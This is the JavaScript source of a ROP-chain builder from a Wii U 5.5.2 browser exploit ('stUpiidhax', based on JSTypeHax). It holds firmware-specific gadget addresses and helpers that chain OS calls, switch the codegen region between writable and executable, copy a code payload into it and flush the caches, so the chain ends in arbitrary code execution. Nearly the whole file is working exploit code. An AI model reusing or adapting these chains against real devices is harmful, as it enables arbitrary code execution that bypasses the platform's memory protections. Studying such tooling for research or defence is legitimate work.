stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

ropchainBuilder.html 4.0KB

  1. <!--
This is just a small helper I load into Chrome's devtools console to build ROP chains interactively.
  3. -->
  4. <script>
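//Rop offset
{
// Address table for the target described in the page title (Wii U 5.5.2).
// Judging by the names there are two kinds of entry: ROP gadgets
// (ROP_POP*, ROP_CALL*, ROP_SETR3*) and entry points of OS library
// functions (ROP_memcpy, ROP_OS*, ROP_os_snprintf). Every value is specific
// to that firmware/binary: on any other version the addresses must be
// re-resolved first, because a stale address does not fail loudly — the
// chain simply lands on whatever instruction happens to live there.
//
// Declared with `var` rather than bare assignment so the table also loads
// under 'use strict'; the names stay globals for the helpers below.

// Gadgets (semantics inferred from their names and from how the helpers
// below lay out their stack frames — confirm against a disassembly).
var ROP_POPJUMPLR_STACK12 = 0x0101cd24;
var ROP_POPJUMPLR_STACK20 = 0x01024d88;
var ROP_CALLFUNC = 0x01080274;
var ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;     // call r28, then pop r28..r31
var ROP_POP_R28R29R30R31 = 0x0101d8d4;
var ROP_POP_R27 = 0x0101cb00;
var ROP_POP_R24_TO_R31 = 0x010204c8;             // frame layout: see ropgen_pop_r24_to_r31
var ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
var ROP_SETR3TOR31_POP_R31 = 0x0101cc10;

// Cache / codegen / memory routines
var ROP_memcpy = 0x01035fc8;
var ROP_DCFlushRange = 0x01023f88;
var ROP_ICInvalidateRange = 0x010240b0;
var ROP_OSSwitchSecCodeGenMode = 0x010376c0;     // toggles codegen area RW- / R-X (see ropgen_OSSwitchSecCodeGenMode)
var ROP_OSCodegenCopy = 0x010376d8;
var ROP_OSGetCodegenVirtAddrRange = 0x010375c0;  // not used by the helpers below

// Thread / core control
var ROP_OSGetCoreId = 0x01024e8c;
var ROP_OSGetCurrentThread = 0x01043150;
var ROP_OSSetThreadAffinity = 0x010429dc;
var ROP_OSYieldThread = 0x010418e4;

// Process / screen / dynamic loading / formatting
var ROP_OSFatal = 0x01031618;
var ROP_Exit = 0x0101cd80;
var ROP_OSScreenFlipBuffersEx = 0x0103afd0;
var ROP_OSScreenClearBufferEx = 0x0103b090;
var ROP_OSDynLoad_Acquire = 0x0102a3b4;
var ROP_OSDynLoad_FindExport = 0x0102b828;
var ROP_os_snprintf = 0x0102f160;
}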
  34. //Rop helper
  35. {
// Backing store for the chain being built: a 64 KiB buffer, a DataView used
// for all writes, and a write cursor (byte offset of the next free word).
var ropCurrentOffset = 0;
var ab = new ArrayBuffer(0x10000),
    ropCurrentDv = new DataView(ab),
    ropChain = new Uint32Array(ab);
// NOTE: ropChain is a convenience view for inspection in the console only.
// Uint32Array uses the host's byte order (little-endian on x86/ARM browsers),
// whereas ropchain_appendu32 writes big-endian through ropCurrentDv, so
// ropChain[i] shows each word byte-swapped. Read back with
// ropCurrentDv.getUint32(i * 4) to see the value that was actually emitted.
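// Append one 32-bit word to the chain at the current cursor and advance it.
//
// val: the word to emit (gadget address, register value or padding). Must be
//      an integer that fits in 32 bits: [0, 0xFFFFFFFF], or a negative int32
//      which is two's-complement wrapped like the original setUint32 call.
// Throws RangeError if val is not such a word, or if the 64 KiB buffer is
// full — both used to fail silently (DataView wraps out-of-range values, so
// e.g. a mistyped 0x1_0101cd24 would have been emitted as 0x0101cd24).
function ropchain_appendu32(val)
{
if (typeof val !== "number" || !isFinite(val) || Math.floor(val) !== val ||
    val < -0x80000000 || val > 0xFFFFFFFF) {
throw new RangeError("ropchain_appendu32: not a 32-bit word: " + val);
}
if (ropCurrentOffset + 4 > ropCurrentDv.byteLength) {
throw new RangeError("ropchain_appendu32: chain buffer full at offset 0x" + ropCurrentOffset.toString(16));
}
// DataView defaults to big-endian, which is the byte order the target CPU
// expects; do not pass littleEndian=true here.
ropCurrentDv.setUint32(ropCurrentOffset, val >>> 0);
ropCurrentOffset += 4;
}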
// Emit the stack frame consumed by the ROP_POP_R24_TO_R31 gadget, loading the
// eight given values into r24..r31.
//
// Frame layout, in stack order: the gadget address, two padding words, the
// eight register values (r24 first), one trailing padding word. The padding
// positions are carried over from the original layout; verify them against
// the gadget's disassembly before changing anything here.
function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
{
var frame = [
ROP_POP_R24_TO_R31,
0x0, 0x0,                               // padding
r24, r25, r26, r27, r28, r29, r30, r31, // popped registers
0x0                                     // padding
];
for (var i = 0; i < frame.length; i++) {
ropchain_appendu32(frame[i]);
}
}
// Emit a call to funcaddr with up to four integer arguments (r3..r6).
//
// The arguments are first staged into callee-saved registers with the
// pop-r24..r31 gadget (r28 <- target, r29 <- r3, r31 <- r4, r25 <- r5,
// r24 <- r6, r27 <- the call-r28 gadget), then ROP_CALLFUNC is emitted,
// followed — per the original frame comments — by a pop of r28..r31 plus one
// padding word. `r28` is the value that ends up in r28 after the call, which
// lets the next frame chain a second call (see ropgen_switchto_core1).
// Exactly which staged register ROP_CALLFUNC moves into which argument
// register is not visible here; confirm against the gadget before reuse.
function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
{
ropgen_pop_r24_to_r31(
r6,                          // r24
r5,                          // r25
0x0,                         // r26
ROP_CALLR28_POP_R28_TO_R31,  // r27
funcaddr,                    // r28
r3,                          // r29
0x0,                         // r30
r4                           // r31
);
var callFrame = [
ROP_CALLFUNC,
r28,   // r28 after the call
0x0,   // r29
0x0,   // r30
0x0,   // r31
0x0    // padding
];
for (var i = 0; i < callFrame.length; i++) {
ropchain_appendu32(callFrame[i]);
}
}
// Emit the sequence
//     t = OSGetCurrentThread(); OSSetThreadAffinity(t, 0x2); OSYieldThread();
// i.e. pin the current thread to the core selected by affinity mask 0x2
// (core 1, going by this function's name) and yield, presumably so the
// scheduler actually migrates the thread before the chain continues.
function ropgen_switchto_core1()
{
// One ROP_CALLR28_POP_R28_TO_R31 frame: call whatever is in r28, then pop a
// fresh r28..r31 (nextR28 into r28, zeros elsewhere) plus one padding word.
function callR28Frame(nextR28)
{
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
ropchain_appendu32(nextR28); // r28
ropchain_appendu32(0x0);     // r29
ropchain_appendu32(0x0);     // r30
ropchain_appendu32(0x0);     // r31
ropchain_appendu32(0x0);     // padding
}

// OSGetCurrentThread() leaves the OSThread* in r3; 0x2 is staged as the
// second argument and OSSetThreadAffinity is preloaded into r28 for the
// next frame.
ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);
// OSSetThreadAffinity(<thread from above>, 0x2); queue OSYieldThread in r28.
callR28Frame(ROP_OSYieldThread);
// OSYieldThread(); nothing is queued for r28 afterwards.
callR28Frame(0x0);
}
// Emit OSSwitchSecCodeGenMode(flag).
//
// flag: 0 makes the codegen area RW- (writable, not executable);
//       1 makes it R-X (executable, not writable).
// This is the W^X switch for the codegen region: anything written while the
// area is in mode 0 must be followed by a switch back to 1 before control is
// transferred into it (see ropgen_copycodebin_to_codegen for the full
// sequence).
function ropgen_OSSwitchSecCodeGenMode(flag)
{
var unusedArg = 0x0;
var unusedR28 = 0x0;
ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, unusedArg, unusedArg, unusedArg, unusedR28);
}
// Emit memcpy(dst, src, size) — r3 = dst, r4 = src, r5 = size.
// No bounds are checked at build time; the caller is responsible for making
// sure [dst, dst+size) is mapped and writable when the chain runs.
function ropgen_memcpy(dst, src, size)
{
var unusedR6 = 0x0;
var unusedR28 = 0x0;
ropgen_callfunc(ROP_memcpy, dst, src, size, unusedR6, unusedR28);
}
// Emit DCFlushRange(addr, size): write back the data-cache lines covering
// [addr, addr+size) so freshly copied code is visible to instruction fetch.
function ropgen_DCFlushRange(addr, size)
{
var unused = 0x0;
ropgen_callfunc(ROP_DCFlushRange, addr, size, unused, unused, unused);
}
// Emit ICInvalidateRange(addr, size): drop any stale instruction-cache lines
// for [addr, addr+size) so the CPU refetches the newly written code.
// Should be emitted after the matching ropgen_DCFlushRange.
function ropgen_ICInvalidateRange(addr, size)
{
var unused = 0x0;
ropgen_callfunc(ROP_ICInvalidateRange, addr, size, unused, unused, unused);
}
// Emit the sequence that installs codebin_size bytes from codebin_addr into
// the codegen area at codegen_addr and makes them executable:
//   1. switch the codegen area to RW-
//   2. memcpy the payload in
//   3. switch the area back to R-X before anything can run from it
//   4. flush the data cache, then invalidate the instruction cache, so the
//      CPU fetches the new bytes rather than stale lines
// The order of steps 3 and 4 is deliberate: the region is never left
// writable once the copy is done.
//
// NOTE(review): nothing checks that codebin_size fits inside the codegen
// region. ROP_OSGetCodegenVirtAddrRange is in the address table but is not
// used here; the caller must size the copy correctly.
function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
{
var MODE_RW = 0;
var MODE_RX = 1;

ropgen_OSSwitchSecCodeGenMode(MODE_RW);
ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
ropgen_OSSwitchSecCodeGenMode(MODE_RX);

ropgen_DCFlushRange(codegen_addr, codebin_size);
ropgen_ICInvalidateRange(codegen_addr, codebin_size);
}
  110. }
  111. </script>